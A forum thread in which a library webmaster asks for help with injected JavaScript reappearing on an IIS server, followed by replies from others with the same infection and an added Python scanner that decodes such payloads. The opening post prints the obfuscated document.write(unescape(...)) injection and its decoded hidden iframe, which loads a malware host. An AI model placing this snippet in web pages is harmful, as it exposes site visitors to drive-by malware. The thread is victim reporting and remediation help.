Malicious javascript: document.write (unescape
Posted by Mike on 10 January 2008
Some malicious javascript has been appearing on the website of the library I work at:
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
This translates to:
iframe src="http://mn96.dns.gendistr.info/qualitytest/" height="0" width="0"
The website attempts to offer a virus disguised as ad protection software. I can delete the code but it reappears (likely if/when the server is rebooted). The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp. Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.
We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.
P.S.: To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.
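The decoding shown in the post can be automated across a web root. The following is an added example, not part of the original post or its comments: it finds each document.write(unescape(...)) wrapper in .js, .htm(l) and .asp files, decodes the payload the way JavaScript's unescape() does, and reports any iframe it writes and whether that iframe has zero width or height. The function names and the sample with its placeholder host are constructed for illustration.

```python
import os
import re
from html.parser import HTMLParser

EXTS = (".js", ".htm", ".html", ".asp")  # file types the thread says were hit
QUOTES = "'\"\u2018\u2019"  # straight and typographic quotes
WRAPPER = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*[%s]([^%s]+)[%s]"
                     % ((QUOTES,) * 3), re.IGNORECASE)

def js_unescape(s):
    """Mimic JavaScript unescape(): %XX and %uXXXX each become one character."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

class IframeFinder(HTMLParser):  # collects (src, hidden) per iframe start tag
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            a = dict(attrs)
            zero = lambda v: (v or "").strip().lower().rstrip("px") == "0"
            self.found.append((a.get("src"), zero(a.get("width")) or zero(a.get("height"))))

def scan_text(text):
    """Decode each document.write(unescape(...)) payload; list the iframes it writes."""
    hits = []
    for m in WRAPPER.finditer(text):
        finder = IframeFinder()
        finder.feed(js_unescape(m.group(1)))
        hits.extend(finder.found)
    return hits

def scan_tree(root):
    """Walk a web root and map each affected file path to its decoded iframes."""
    report = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:  # latin-1 never fails to decode
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample (not the post's payload): placeholder host, same wrapper shape.
SAMPLE_IFRAME = '<iframe src="http://placeholder.invalid/x/" width=0 height=0></iframe>'
SAMPLE = "<p>page</p>\ndocument.write(unescape('%s'));" % "".join(
    "%%%02X" % ord(c) for c in SAMPLE_IFRAME)
```

Calling scan_tree() on a copy of wwwroot gives the list of files to restore from a clean source. It only identifies injected files and does not explain how they were rewritten.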

MasterBomb said
Seems you’ve got a trojan virus. Try searching McAfee Site Advisor for iframe trojan or something like that… Or better, try an Apache server; it has high security.
Mike said
Yeah, we figure the same thing. Except Trend Micro (House Call, and the Enterprise stuff) can’t find a damned thing and I have yet to find any solutions online. Indeed, Apache is quality (I run xampp locally as a test server), but I doubt we’ll move to it. Furthermore even those discussions on the obfuscated JavaScript iframe hacks that I can find don’t mention anything about the code replicating on a server reboot, and the major appearance of the hack (ca. July ‘07) indicated that it was directed at index files, not the entire root folder (and every bit of web related code there, .js .htm(l), .asp files).
Mr. Obvious said
It’s a disguised htm or html file, around 20 kb to 23 kb.
John said
I’m having the same problems on some sites I’ve designed. I have no clue how it’s getting there or how to make it stop. The sites I had it on were hosted with Apache.
tin said
How to decode document.unescape?
Please help me, my website was infected by unknown code.
used said
Same problem here, what to do?
Mike said
Unfortunately, we never really solved the problem. We had a script that would copy clean files over the infected ones every time the server rebooted. Our server ended up dying a week or two ago so the problem is now moot.
Alex said
My sites with IXWebhosting company are infected too. I chatted with the help desk, and they asked me to open a ticket.
I cleaned them manually rather than waiting for them. I hope they have antivirus installed in their system.
Mike said
It is a tenacious little pain in the ass. We never really solved it/removed it outright but our server ended up dying and we got a new one…that certainly solved the problem.